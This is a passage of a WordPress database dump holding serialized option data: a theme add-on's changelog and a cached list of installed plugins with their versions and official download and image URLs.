class=\"yes\"></span></p>\n<p>            Pricing Section<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Testimonial Section<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Call To Action Section<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Projects Section<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            Typography Options<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n<p>            24/7 Priority Support<br />\n            <span class=\"no\"></span><br />\n            <span class=\"yes\"></span></p>\n\";}s:9:\"changelog\";a:1:{i:0;s:6777:\"<p>2.1.4</p>\n<ul>\n<li>FIXED: Header already sent.</li>\n<li>IMPROVED: Gallery section in old WP version.</li>\n</ul>\n<p>2.1.3</p>\n<ul>\n<li>NEW: Add heading font for main post title.</li>\n<li>NEW: Add CTA button target option.</li>\n<li>NEW: Make client section is carousel.</li>\n<li>NEW: Gallery section compatible with Gutenberg Gallery.</li>\n<li>IMPROVED: Customize live preview css for bg color in section Order styling.</li>\n<li>IMPROVED: Improve typogarphy.</li>\n<li>FIXED: Section Order &amp; Styling - the Background Image.</li>\n<li>FIXED: The slider description color.</li>\n</ul>\n<p>2.1.2</p>\n<ul>\n<li>IMPROVED: Improve typography.</li>\n<li>IMPROVED: Improve template portfolios.</li>\n</ul>\n<p>2.1.1</p>\n<ul>\n<li>FIXED: Remove notice when using child theme</li>\n</ul>\n<p>2.1.1</p>\n<ul>\n<li>FIXED: Fix issue lost hero video settings.</li>\n</ul>\n<p>2.1.0</p>\n<ul>\n<li>NEW: Support sections manager.</li>\n<li>NEW: Section Slider.</li>\n<li>IMPROVED: Front page section config.</li>\n</ul>\n<p>2.0.7</p>\n<ul>\n<li>FIXED: Fix section map issue.</li>\n</ul>\n<p>2.0.7</p>\n<ul>\n<li>NEW: Add dots navigation configs.</li>\n<li>NEW: add client image alt attribute.</li>\n<li>IMPROVED: Update load custom css and js.</li>\n<li>IMPROVED: Update sections navigation settings.</li>\n<li>IMPROVED: Update license message.</li>\n<li>FIXED: Fix issue google font url.</li>\n</ul>\n<p>2.0.6</p>\n<ul>\n<li>NEW: Support custom section page styling.</li>\n<li>IMPROVED: Custom section styling.</li>\n</ul>\n<p>2.0.6</p>\n<ul>\n<li>NEW: Support custom section page styling.</li>\n<li>IMPROVED: Custom section styling.</li>\n</ul>\n<p>2.0.3</p>\n<ul>\n<li>NEW: Add Custom testimonial color option.</li>\n<li>IMPROVED: Support page content when Elementor not activated.</li>\n<li>FIXED: Project layout issue.</li>\n</ul>\n<p>2.0.2</p>\n<ul>\n<li>NEW: Support Elementor for front page.</li>\n</ul>\n<p>2.0.1</p>\n<ul>\n<li>REMOVED: Site identity colors, moved to Theme Options -&gt; Header.</li>\n</ul>\n<p>2.0.0</p>\n<ul>\n<li>NEW: Projects layout.</li>\n<li>NEW: Projects page template.</li>\n<li>NEW: View all projects button.</li>\n<li>NEW: Admin dismiss notice.</li>\n<li>NEW: Add hero heading typography.</li>\n<li>NEW: Clients link target settings.</li>\n<li>IMPROVED: auto update function.</li>\n<li>IMPROVED: Hero settings.</li>\n<li>REMOVED: Upsell sections.</li>\n</ul>\n<p>1.2.8</p>\n<ul>\n<li>Improve auto update function.</li>\n</ul>\n<p>1.2.7</p>\n<ul>\n<li>Improve get gallery data function.</li>\n<li>Fix video issue.</li>\n<li>Add custom section full width option.</li>\n<li>Fix map issue.</li>\n</ul>\n<p>1.2.6</p>\n<ul>\n<li>Fix project details on mobile.</li>\n<li>Fix typography.</li>\n</ul>\n<p>1.2.5</p>\n<ul>\n<li>Fix project details.</li>\n</ul>\n<p>1.2.4</p>\n<ul>\n<li>Do not duplicate project details.</li>\n<li>Run shortcode in hero content.</li>\n<li>Add style for CTA button.</li>\n<li>Add Site Title font option.</li>\n<li>Do not effect content by plugins.</li>\n<li>Clean up CSS.</li>\n</ul>\n<p>1.2.3</p>\n<ul>\n<li>Improve parallax.</li>\n<li>Improve ajax projects.</li>\n</ul>\n<p>1.2.2</p>\n<ul>\n<li>Update responsive parallax.</li>\n<li>Update languages file.</li>\n<li>Update license messages.</li>\n</ul>\n<p>1.2.1</p>\n<ul>\n<li>Update parallax.</li>\n<li>Update map section.</li>\n<li>Update sections templates.</li>\n</ul>\n<p>1.2.0</p>\n<ul>\n<li>Sync parallax.</li>\n</ul>\n<p>1.1.9</p>\n<ul>\n<li>Fix a bug could not load gallery js, css when active plus plugin.</li>\n<li>Update video lightbox template.</li>\n<li>Change hero loading icon.</li>\n<li>Make contact form label full width.</li>\n<li>Fix feature align on small dekstop.</li>\n<li>Improve Google Map, remove default API key (You need your own key to show Google Map).</li>\n<li>Improve auto update.</li>\n<li>Update portfolio parallax.</li>\n<li>Update language file.</li>\n</ul>\n<p>1.1.8</p>\n<ul>\n<li>WP 4.7 compatible.</li>\n<li>Sync CSS with OnePress theme.</li>\n<li>Add reason if could not activate license.</li>\n</ul>\n<p>1.1.7</p>\n<ul>\n<li>Improve gallery.</li>\n<li>Support email for team member.</li>\n</ul>\n<p>1.1.6</p>\n<ul>\n<li>Add condition to check address</li>\n<li>Improve header.</li>\n</ul>\n<p>1.1.5</p>\n<ul>\n<li>Improve Section map</li>\n<li>Clean output css.</li>\n</ul>\n<p>1.1.4</p>\n<ul>\n<li>Hide onepress_gallery_disable customizer.</li>\n</ul>\n<p>1.1.3</p>\n<ul>\n<li>Add version to assets url.</li>\n<li>Fix Problem on IE 9+</li>\n<li>Update Style to version 1.2.6</li>\n<li>Add Gallery section.</li>\n</ul>\n<p>1.1.2</p>\n<ul>\n<li>Improve get settings data.</li>\n<li>Update get client data</li>\n<li>Remove function not use.</li>\n<li>Update hero slider.</li>\n<li>Add support demo content.</li>\n<li>Support HTML for custom section description.</li>\n</ul>\n<p>1.1.1</p>\n<ul>\n<li>Fix Google Map API issue.</li>\n<li>Fix Testimonies avatar issue.</li>\n</ul>\n<p>1.1.0</p>\n<ul>\n<li>Use ShortCode within section description.</li>\n<li>Update portfolio conditional var.</li>\n</ul>\n<p>1.0.9</p>\n<ul>\n<li>Fix translation issues.</li>\n<li>Change textdomain to onepress-plus.</li>\n<li>Fix Google map issue on SSL.</li>\n<li>Add selective refresh for customizer.</li>\n<li>Add language .pot file.</li>\n<li>Update clients style.</li>\n<li>Fix bug incorrect image fallback for video bg.</li>\n<li>Fix feature items break layout.</li>\n<li>Support pricing table up to 4 tables.</li>\n</ul>\n<p>1.0.7</p>\n<ul>\n<li>New add map multi markers.</li>\n<li>New add client showcase section.</li>\n<li>Change textarea to editor.</li>\n<li>Improve project loading icon fixed.</li>\n<li>Fix bug show  empty .section-section-area if title empty.</li>\n<li>Add condition to check section heading area.</li>\n</ul>\n<p>1.0.6</p>\n<ul>\n<li>Update hero section template</li>\n<li>Add breadcrumb for single project</li>\n</ul>\n<p>1.0.5</p>\n<ul>\n<li>New add new custom section via Customizer</li>\n<li>New testimonial light style</li>\n<li>New link for member in team section.</li>\n<li>Add more hero layout content.</li>\n<li>Add description field for all section.</li>\n<li>More hooks around each section.</li>\n</ul>\n<p>1.0.4</p>\n<ul>\n<li>Improve Video background, display image on mobile (if background image is set).</li>\n<li>Add an option to replace video with image background on mobile devices.</li>\n<li>Fix a bug sometime lost customize data.</li>\n</ul>\n<p>1.0.3</p>\n<ul>\n<li>Remove parallax settings (move to theme settings).</li>\n<li>Add documentation link to theme dashboard.</li>\n<li>Fix project sections labels</li>\n<li>Remove admin notice.</li>\n<li>Remove duplicate facebook field.</li>\n<li>Fix projects loading icon issue.</li>\n<li>Disable project ajax by default.</li>\n<li>Video Lightbox doesn\'t display in Section Orders &amp; Styling.</li>\n</ul>\n<p>1.0.2</p>\n<ul>\n<li>Change define version number</li>\n</ul>\n<p>1.0.1</p>\n<ul>\n<li>New: Video Lightbox section.</li>\n<li>Fix bugs.</li>\n</ul>\n<p>1.0.0</p>\n<ul>\n<li>Release.</li>\n</ul>\n\";}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:22:{s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:49:\"w.org/plugins/all-in-one-wp-security-and-firewall\";s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:6:\"plugin\";s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";s:11:\"new_version\";s:5:\"4.4.2\";s:3:\"url\";s:66:\"https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/\";s:7:\"package\";s:78:\"https://downloads.wordpress.org/plugin/all-in-one-wp-security-and-firewall.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:88:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/icon-128x128.png?rev=1232826\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:91:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/banner-1544x500.png?rev=1914011\";s:2:\"1x\";s:90:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/banner-772x250.png?rev=1914013\";}s:11:\"banners_rtl\";a:0:{}}s:16:\"gotmls/index.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:20:\"w.org/plugins/gotmls\";s:4:\"slug\";s:6:\"gotmls\";s:6:\"plugin\";s:16:\"gotmls/index.php\";s:11:\"new_version\";s:7:\"4.18.76\";s:3:\"url\";s:37:\"https://wordpress.org/plugins/gotmls/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/plugin/gotmls.4.18.76.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/gotmls/assets/icon-256x256.png?rev=1001824\";s:2:\"1x\";s:59:\"https://ps.w.org/gotmls/assets/icon-128x128.png?rev=1001824\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/gotmls/assets/banner-772x250.jpg?rev=1043954\";}s:11:\"banners_rtl\";a:0:{}}s:59:\"black-studio-tinymce-widget/black-studio-tinymce-widget.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:41:\"w.org/plugins/black-studio-tinymce-widget\";s:4:\"slug\";s:27:\"black-studio-tinymce-widget\";s:6:\"plugin\";s:59:\"black-studio-tinymce-widget/black-studio-tinymce-widget.php\";s:11:\"new_version\";s:5:\"2.6.9\";s:3:\"url\";s:58:\"https://wordpress.org/plugins/black-studio-tinymce-widget/\";s:7:\"package\";s:76:\"https://downloads.wordpress.org/plugin/black-studio-tinymce-widget.2.6.9.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:80:\"https://ps.w.org/black-studio-tinymce-widget/assets/icon-256x256.png?rev=1002774\";s:2:\"1x\";s:80:\"https://ps.w.org/black-studio-tinymce-widget/assets/icon-128x128.png?rev=1002774\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:83:\"https://ps.w.org/black-studio-tinymce-widget/assets/banner-1544x500.png?rev=1002774\";s:2:\"1x\";s:82:\"https://ps.w.org/black-studio-tinymce-widget/assets/banner-772x250.png?rev=1002774\";}s:11:\"banners_rtl\";a:0:{}}s:33:\"classic-editor/classic-editor.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:28:\"w.org/plugins/classic-editor\";s:4:\"slug\";s:14:\"classic-editor\";s:6:\"plugin\";s:33:\"classic-editor/classic-editor.php\";s:11:\"new_version\";s:3:\"1.5\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/classic-editor/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/classic-editor.1.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/classic-editor/assets/icon-256x256.png?rev=1998671\";s:2:\"1x\";s:67:\"https://ps.w.org/classic-editor/assets/icon-128x128.png?rev=1998671\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/classic-editor/assets/banner-1544x500.png?rev=1998671\";s:2:\"1x\";s:69:\"https://ps.w.org/classic-editor/assets/banner-772x250.png?rev=1998676\";}s:11:\"banners_rtl\";a:0:{}}s:37:\"disable-comments/disable-comments.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:30:\"w.org/plugins/disable-comments\";s:4:\"slug\";s:16:\"disable-comments\";s:6:\"plugin\";s:37:\"disable-comments/disable-comments.php\";s:11:\"new_version\";s:6:\"1.10.2\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/disable-comments/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/disable-comments.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/disable-comments/assets/icon-256x256.png?rev=971176\";s:2:\"1x\";s:68:\"https://ps.w.org/disable-comments/assets/icon-128x128.png?rev=971176\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/disable-comments/assets/banner-1544x500.png?rev=1652560\";s:2:\"1x\";s:71:\"https://ps.w.org/disable-comments/assets/banner-772x250.png?rev=1652560\";}s:11:\"banners_rtl\";a:0:{}}s:35:\"disable-xml-rpc/disable-xml-rpc.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:29:\"w.org/plugins/disable-xml-rpc\";s:4:\"slug\";s:15:\"disable-xml-rpc\";s:6:\"plugin\";s:35:\"disable-xml-rpc/disable-xml-rpc.php\";s:11:\"new_version\";s:5:\"1.0.1\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/disable-xml-rpc/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/disable-xml-rpc.1.0.1.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:59:\"https://s.w.org/plugins/geopattern-icon/disable-xml-rpc.svg\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}}s:53:\"disable-xml-rpc-pingback/disable-xml-rpc-pingback.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:38:\"w.org/plugins/disable-xml-rpc-pingback\";s:4:\"slug\";s:24:\"disable-xml-rpc-pingback\";s:6:\"plugin\";s:53:\"disable-xml-rpc-pingback/disable-xml-rpc-pingback.php\";s:11:\"new_version\";s:5:\"1.2.1\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/disable-xml-rpc-pingback/\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/plugin/disable-xml-rpc-pingback.1.2.1.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:75:\"https://s.w.org/plugins/geopattern-icon/disable-xml-rpc-pingback_acd4d7.svg\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:78:\"https://ps.w.org/disable-xml-rpc-pingback/assets/banner-772x250.png?rev=874097\";}s:11:\"banners_rtl\";a:0:{}}s:53:\"famethemes-demo-importer/famethemes-demo-importer.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:38:\"w.org/plugins/famethemes-demo-importer\";s:4:\"slug\";s:24:\"famethemes-demo-importer\";s:6:\"plugin\";s:53:\"famethemes-demo-importer/famethemes-demo-importer.php\";s:11:\"new_version\";s:5:\"1.1.2\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/famethemes-demo-importer/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/famethemes-demo-importer.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:68:\"https://s.w.org/plugins/geopattern-icon/famethemes-demo-importer.svg\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}}s:36:\"google-sitemap-generator/sitemap.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:38:\"w.org/plugins/google-sitemap-generator\";s:4:\"slug\";s:24:\"google-sitemap-generator\";s:6:\"plugin\";s:36:\"google-sitemap-generator/sitemap.php\";s:11:\"new_version\";s:5:\"4.1.0\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/google-sitemap-generator/\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/plugin/google-sitemap-generator.4.1.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:77:\"https://ps.w.org/google-sitemap-generator/assets/icon-256x256.png?rev=1701944\";s:2:\"1x\";s:77:\"https://ps.w.org/google-sitemap-generator/assets/icon-128x128.png?rev=1701944\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:79:\"https://ps.w.org/google-sitemap-generator/assets/banner-772x250.png?rev=1701944\";}s:11:\"banners_rtl\";a:0:{}}s:21:\"hello-dolly/hello.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:21:\"hello-dolly/hello.php\";s:11:\"new_version\";s:5:\"1.7.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=2052855\";s:2:\"1x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=2052855\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/hello-dolly/assets/banner-772x250.jpg?rev=2052855\";}s:11:\"banners_rtl\";a:0:{}}s:29:\"ip-geo-block/ip-geo-block.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:26:\"w.org/plugins/ip-geo-block\";s:4:\"slug\";s:12:\"ip-geo-block\";s:6:\"plugin\";s:29:\"ip-geo-block/ip-geo-block.php\";s:11:\"new_version\";s:8:\"3.0.17.4\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/ip-geo-block/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/ip-geo-block.3.0.17.4.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:65:\"https://ps.w.org/ip-geo-block/assets/icon-128x128.png?rev=1148568\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:67:\"https://ps.w.org/ip-geo-block/assets/banner-772x250.jpg?rev=1148568\";}s:11:\"banners_rtl\";a:0:{}}s:41:\"better-wp-security/better-wp-security.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:32:\"w.org/plugins/better-wp-security\";s:4:\"slug\";s:18:\"better-wp-security\";s:6:\"plugin\";s:41:\"better-wp-security/better-wp-security.php\";s:11:\"new_version\";s:5:\"7.4.1\";s:3:\"url\";s:49:\"https://wordpress.org/plugins/better-wp-security/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/better-wp-security.7.4.1.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:70:\"https://ps.w.org/better-wp-security/assets/icon-256x256.jpg?rev=969999\";s:2:\"1x\";s:62:\"https://ps.w.org/better-wp-security/assets/icon.svg?rev=970042\";s:3:\"svg\";s:62:\"https://ps.w.org/better-wp-security/assets/icon.svg?rev=970042\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:72:\"https://ps.w.org/better-wp-security/assets/banner-772x250.png?rev=881897\";}s:11:\"banners_rtl\";a:0:{}}s:63:\"limit-login-attempts-reloaded/limit-login-attempts-reloaded.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:43:\"w.org/plugins/limit-login-attempts-reloaded\";s:4:\"slug\";s:29:\"limit-login-attempts-reloaded\";s:6:\"plugin\";s:63:\"limit-login-attempts-reloaded/limit-login-attempts-reloaded.php\";s:11:\"new_version\";s:5:\"2.9.0\";s:3:\"url\";s:60:\"https://wordpress.org/plugins/limit-login-attempts-reloaded/\";s:7:\"package\";s:78:\"https://downloads.wordpress.org/plugin/limit-login-attempts-reloaded.2.9.0.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:74:\"https://ps.w.org/limit-login-attempts-reloaded/assets/icon.svg?rev=1472250\";s:3:\"svg\";s:74:\"https://ps.w.org/limit-login-attempts-reloaded/assets/icon.svg?rev=1472250\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}}s:23:\"loginizer/loginizer.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:23:\"w.org/plugins/loginizer\";s:4:\"slug\";s:9:\"loginizer\";s:6:\"plugin\";s:23:\"loginizer/loginizer.php\";s:11:\"new_version\";s:5:\"1.4.2\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/loginizer/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/loginizer.1.4.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:62:\"https://ps.w.org/loginizer/assets/icon-256x256.png?rev=1381093\";s:2:\"1x\";s:62:\"https://ps.w.org/loginizer/assets/icon-128x128.png?rev=1381093\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/loginizer/assets/banner-1544x500.jpg?rev=1517954\";s:2:\"1x\";s:64:\"https://ps.w.org/loginizer/assets/banner-772x250.jpg?rev=1517954\";}s:11:\"banners_rtl\";a:0:{}}s:59:\"remove-xmlrpc-pingback-ping/remove-xmlrpc-pingback-ping.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:41:\"w.org/plugins/remove-xmlrpc-pingback-ping\";s:4:\"slug\";s:27:\"remove-xmlrpc-pingback-ping\";s:6:\"plugin\";s:59:\"remove-xmlrpc-pingback-ping/remove-xmlrpc-pingback-ping.php\";s:11:\"new_version\";s:3:\"1.1\";s:3:\"url\";s:58:\"https://wordpress.org/plugins/remove-xmlrpc-pingback-ping/\";s:7:\"package\";s:74:\"https://downloads.wordpress.org/plugin/remove-xmlrpc-pingback-ping.1.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:80:\"https://ps.w.org/remove-xmlrpc-pingback-ping/assets/icon-256x256.png?rev=2065246\";s:2:\"1x\";s:80:\"https://ps.w.org/remove-xmlrpc-pingback-ping/assets/icon-128x128.png?rev=2065246\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:81:\"https://ps.w.org/remove-xmlrpc-pingback-ping/assets/banner-772x250.png?rev=877225\";}s:11:\"banners_rtl\";a:0:{}}s:32:\"wp-simple-firewall/icwp-wpsf.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:32:\"w.org/plugins/wp-simple-firewall\";s:4:\"slug\";s:18:\"wp-simple-firewall\";s:6:\"plugin\";s:32:\"wp-simple-firewall/icwp-wpsf.php\";s:11:\"new_version\";s:5:\"8.2.3\";s:3:\"url\";s:49:\"https://wordpress.org/plugins/wp-simple-firewall/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/wp-simple-firewall.8.2.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/wp-simple-firewall/assets/icon-256x256.png?rev=1630854\";s:2:\"1x\";s:71:\"https://ps.w.org/wp-simple-firewall/assets/icon-128x128.jpg?rev=1618782\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/wp-simple-firewall/assets/banner-1544x500.png?rev=2056213\";s:2:\"1x\";s:73:\"https://ps.w.org/wp-simple-firewall/assets/banner-772x250.png?rev=2056214\";}s:11:\"banners_rtl\";a:0:{}}s:23:\"wp-smushit/wp-smush.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:24:\"w.org/plugins/wp-smushit\";s:4:\"slug\";s:10:\"wp-smushit\";s:6:\"plugin\";s:23:\"wp-smushit/wp-smush.php\";s:11:\"new_version\";s:5:\"3.3.1\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/wp-smushit/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/wp-smushit.3.3.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/wp-smushit/assets/icon-256x256.jpg?rev=2132251\";s:2:\"1x\";s:63:\"https://ps.w.org/wp-smushit/assets/icon-128x128.jpg?rev=2132250\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/wp-smushit/assets/banner-1544x500.png?rev=1863697\";s:2:\"1x\";s:65:\"https://ps.w.org/wp-smushit/assets/banner-772x250.png?rev=1863697\";}s:11:\"banners_rtl\";a:0:{}}s:38:\"swift-performance-lite/performance.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:36:\"w.org/plugins/swift-performance-lite\";s:4:\"slug\";s:22:\"swift-performance-lite\";s:6:\"plugin\";s:38:\"swift-performance-lite/performance.php\";s:11:\"new_version\";s:5:\"2.1.1\";s:3:\"url\";s:53:\"https://wordpress.org/plugins/swift-performance-lite/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/swift-performance-lite.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:75:\"https://ps.w.org/swift-performance-lite/assets/icon-256x256.jpg?rev=1816165\";s:2:\"1x\";s:75:\"https://ps.w.org/swift-performance-lite/assets/icon-128x128.jpg?rev=1816165\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:77:\"https://ps.w.org/swift-performance-lite/assets/banner-772x250.jpg?rev=1816165\";}s:11:\"banners_rtl\";a:0:{}}s:43:\"visual-form-builder/visual-form-builder.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:33:\"w.org/plugins/visual-form-builder\";s:4:\"slug\";s:19:\"visual-form-builder\";s:6:\"plugin\";s:43:\"visual-form-builder/visual-form-builder.php\";s:11:\"new_version\";s:5:\"3.0.1\";s:3:\"url\";s:50:\"https://wordpress.org/plugins/visual-form-builder/\";s:7:\"package\";s:68:\"https://downloads.wordpress.org/plugin/visual-form-builder.3.0.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/visual-form-builder/assets/icon-256x256.png?rev=1205840\";s:2:\"1x\";s:72:\"https://ps.w.org/visual-form-builder/assets/icon-128x128.png?rev=1205840\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:75:\"https://ps.w.org/visual-form-builder/assets/banner-1544x500.png?rev=1205840\";s:2:\"1x\";s:74:\"https://ps.w.org/visual-form-builder/assets/banner-772x250.png?rev=1205840\";}s:11:\"banners_rtl\";a:0:{}}s:39:\"wp-file-manager/file_folder_manager.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:29:\"w.org/plugins/wp-file-manager\";s:4:\"slug\";s:15:\"wp-file-manager\";s:6:\"plugin\";s:39:\"wp-file-manager/file_folder_manager.php\";s:11:\"new_version\";s:3:\"5.4\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/wp-file-manager/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/wp-file-manager.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:68:\"https://ps.w.org/wp-file-manager/assets/icon-128x128.png?rev=1846029\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:70:\"https://ps.w.org/wp-file-manager/assets/banner-772x250.jpg?rev=1846030\";}s:11:\"banners_rtl\";a:0:{}}s:55:\"wp-geo-website-protection/wp-geo-website-protection.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:39:\"w.org/plugins/wp-geo-website-protection\";s:4:\"slug\";s:25:\"wp-geo-website-protection\";s:6:\"plugin\";s:55:\"wp-geo-website-protection/wp-geo-website-protection.php\";s:11:\"new_version\";s:3:\"2.6\";s:3:\"url\";s:56:\"https://wordpress.org/plugins/wp-geo-website-protection/\";s:7:\"package\";s:72:\"https://downloads.wordpress.org/plugin/wp-geo-website-protection.2.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:78:\"https://ps.w.org/wp-geo-website-protection/assets/icon-256x256.png?rev=1516142\";s:2:\"1x\";s:78:\"https://ps.w.org/wp-geo-website-protection/assets/icon-128x128.png?rev=1516142\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:80:\"https://ps.w.org/wp-geo-website-protection/assets/banner-772x250.png?rev=1516142\";}s:11:\"banners_rtl\";a:0:{}}s:24:\"wordpress-seo/wp-seo.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:27:\"w.org/plugins/wordpress-seo\";s:4:\"slug\";s:13:\"wordpress-seo\";s:6:\"plugin\";s:24:\"wordpress-seo/wp-seo.php\";s:11:\"new_version\";s:4:\"12.5\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/wordpress-seo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/wordpress-seo.12.5.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:66:\"https://ps.w.org/wordpress-seo/assets/icon-256x256.png?rev=1834347\";s:2:\"1x\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=1946641\";s:3:\"svg\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=1946641\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500.png?rev=1843435\";s:2:\"1x\";s:68:\"https://ps.w.org/wordpress-seo/assets/banner-772x250.png?rev=1843435\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500-rtl.png?rev=1843435\";s:2:\"1x\";s:72:\"https://ps.w.org/wordpress-seo/assets/banner-772x250-rtl.png?rev=1843435\";}s:6:\"tested\";s:3:\"5.3\";s:12:\"requires_php\";s:6:\"5.6.20\";s:13:\"compatibility\";a:0:{}}}}'),(532,1,'wdev-frash','a:3:{s:7:\"plugins\";a:1:{s:23:\"wp-smushit/wp-smush.php\";i:1545805027;}s:5:\"queue\";a:0:{}s:4:\"done\";a:2:{i:0;a:6:{s:6:\"plugin\";s:23:\"wp-smushit/wp-smush.php\";s:4:\"type\";s:5:\"email\";s:7:\"show_at\";i:1545805027;s:5:\"state\";s:6:\"ignore\";s:4:\"hash\";s:32:\"fc50097023d0d34c5a66f6cddcf77694\";s:10:\"handled_at\";i:1549855753;}i:1;a:6:{s:6:\"plugin\";s:23:\"wp-smushit/wp-smush.php\";s:4:\"type\";s:4:\"rate\";s:7:\"show_at\";i:154